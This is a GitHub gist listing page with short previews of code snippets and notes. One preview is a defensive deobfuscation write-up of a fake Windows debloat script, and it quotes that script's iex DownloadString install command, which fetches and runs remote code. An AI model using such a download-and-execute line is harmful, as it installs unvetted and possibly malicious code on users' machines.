Carsten Brueggmann Nonlinearsound

@Nonlinearsound
Nonlinearsound / gist:cf2064b5d0a42de9ef1ef64d79511fda
Last active November 5, 2023 23:36
Go: Execute a sub process and kill it from within the host application

Description

This example program creates a context using the context.WithCancel() method from the context package.

WithCancel creates the context while returning a cancel function that can be called to prematurely cancel/end the context.

exec.CommandContext(ctx, ".\\test.exe", "e") works like exec.Command(), but ties the creation and execution of the sub process to a context. Using that context, the execution of the sub process can now be ended prematurely.

test.exe is another compiled and linked Go program that just loops forever, printing "ENDLESS.." to the console. Because the example program calls cmd.Wait(), it waits for the sub process to end, either by ending by itself or by being killed by another system process.

Nonlinearsound / get_data_flutter.dart
Created July 25, 2023 21:47
Initial example of getting data from a server in Flutter and displaying that data
import 'dart:async';
import 'dart:convert';
import 'package:flutter/material.dart' hide MenuItem;
import 'package:http/http.dart' as http;
void main() async {
runApp(const MyApp());
}
Nonlinearsound / nmap_ip_mac_to_csv.md
Last active December 9, 2022 11:00
Transform nmap IP and MAC scan into csv file using PowerShell

If you're gathering IP and MAC addresses using nmap on a Windows machine, you can use PowerShell instead of awk to transform the output into a comma-separated file containing the IP and MAC addresses.

nmap -sP -n -oX scan.xml 192.168.1.0/24 

This call produces an XML file containing the scanned hosts as XML nodes, each with subnodes holding address information. The address nodes will be the IP address and the MAC address.

<host>
	<status reason="arp-response" reason_ttl="0" state="up"/>
Nonlinearsound / windowtoolbox-malicious-behavior.md
Last active April 19, 2022 10:38
A deobfuscation attempt on a PowerShell script pretending to be an optimization/debloat script for Windows

The goal

The public repo https://github.com/windowtoolbox/under_observation (GitHub changed the original name, as the repo is now under observation and all repo files are inaccessible) appeared to provide a PowerShell script that optimizes and debloats your Windows installation. Strangely enough, the actual script was not included in the repo as a file but only as a download link in the repo's readme file. It was all quite suspicious. The installation instruction was the typical iex instruction, like this:

iex((New-Object System.Net.WebClient).DownloadString('https://link-to-the-scriptfile'))

Downloading the script by hand gives us a PowerShell script with a lot of instructions that actually do what the script claimed to do: they change a lot of system parameters for optimization and uninstall software to debloat Windows.

But besides that code, there are two blocks of obfuscated code that looked suspicious - well, they are obfuscated, so you wouldn't expect them to contain

Storing and retrieving Windows Credential Manager info in C# and Go

Lately I had the need to store SMTP credentials somewhere on the system to be used by a small Go application that would automatically send mails to administrators in case a certain ETW event fired. The solution on Windows is to use the Windows Credential Manager. On Linux you could use pass.

I needed both solutions for Go and C#.

Go

In Go it's pretty simple as Daniel Joos already wrote a nice package for exactly that purpose. You can get it here:

<?xml version="1.0" encoding="UTF-8"?>
<PropertyList>
<fx>
<crank>
<name>engstart</name>
<path>Aircraft/SpitfireVb_VooDoo/Sounds/merlin-start.wav</path>
<condition>
<?xml version="1.0"?>
<!--
************************************************************************
Spitfire Vb configuration
************************************************************************
-->
<PropertyList>
<sim>